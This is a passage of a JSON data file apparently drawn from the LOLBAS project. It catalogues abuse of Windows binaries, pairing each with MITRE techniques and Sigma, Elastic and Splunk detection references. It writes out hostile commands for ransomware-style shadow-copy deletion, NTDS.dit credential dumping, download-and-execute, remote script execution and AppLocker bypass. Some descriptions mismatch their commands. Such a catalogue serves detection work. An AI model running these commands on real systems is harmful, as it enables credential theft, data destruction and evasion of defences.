/all /quiet","description":"Delete all volume shadow copies on the host without prompting","usecase":"Destroy shadow copies to prevent file and system recovery, a technique commonly used by ransomware","mitre":["T1490"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"}],"references":["https://attack.mitre.org/techniques/T1490/","https://github.com/Neo23x0/Raccine","https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"]},{"id":"lolbas:wab-exe:0","toolId":"lolbas:wab-exe","toolName":"Wab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wab.exe","description":"Change HKLM\\Software\\Microsoft\\WAB\\DLLPath and execute DLL of choice","usecase":"Execute dll file. Bypass defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"},{"type":"IOC","value":"WAB.exe should normally never be used"}],"references":["https://twitter.com/Hexacorn/status/991447379864932352","http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Wab/"]},{"id":"lolbas:wbadmin-exe:0","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -quiet","description":"Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"]},{"id":"lolbas:wbadmin-exe:1","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -notRestoreAcl -quiet","description":"Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"]},{"id":"lolbas:wbemtest-exe:0","toolId":"lolbas:wbemtest-exe","toolName":"wbemtest.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wbemtest.exe","description":"Execute arbitary commands through WMI through a GUI managment interface for Web Based Enterprise Management testing (WBEM). Uses WMI to Create and instance of a Win32_Process WMI class with a commandline argument of the target command to spawn. Spawns a GUI so it requires interactive access. For a demo, see link to blog in resources.","usecase":"Execute arbitrary commands through WMI classes","mitre":["T1047"],"privilege":"user","fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"wbemtest.exe binary spawned"}],"references":["https://saulpanders.github.io/2025/01/20/lolbas-wbemtest.html","https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"]},{"id":"lolbas:winget-exe:0","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winget.exe install --manifest {PATH:.yml}","description":"Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`","usecase":"Download and execute an arbitrary file from the internet","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:winget-exe:1","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:winget-exe:2","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:wlrmdr-exe:0","toolId":"lolbas:wlrmdr-exe","toolName":"Wlrmdr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}","description":"Execute executable with wlrmdr.exe as parent process","usecase":"Use wlrmdr as a proxy binary to evade defensive countermeasures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml"},{"type":"IOC","value":"wlrmdr.exe spawning any new processes"}],"references":["https://twitter.com/0gtweet/status/1493963591745220608","https://twitter.com/Oddvarmoe/status/927437787242090496","https://twitter.com/falsneg/status/1461625526640992260","https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw","https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"]},{"id":"lolbas:wmic-exe:0","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wmic.exe process call create \"{PATH_ABSOLUTE}:program.exe\"","description":"Execute a .EXE file stored as an Alternate Data Stream (ADS)","usecase":"Execute binary file hidden in Alternate data streams to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:1","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process call create \"{CMD}\"","description":"Execute calc from wmic","usecase":"Execute binary from wmic to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:2","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe /node:\"192.168.0.1\" process call create \"{CMD}\"","description":"Execute evil.exe on the remote system.","usecase":"Execute binary on a remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:3","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{REMOTEURL:.xsl}\"","description":"Create a volume shadow copy of NTDS.dit that can be copied.","usecase":"Execute binary on remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:4","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{PATH_SMB:.xsl}\"","description":"Executes JScript or VBScript embedded in the target remote XSL stylsheet.","usecase":"Execute script from remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:5","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"wmic.exe datafile where \"Name='C:\\\\windows\\\\system32\\\\calc.exe'\" call Copy \"C:\\\\users\\\\public\\\\calc.exe\"","description":"Copy file from source to destination.","usecase":"Copy file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-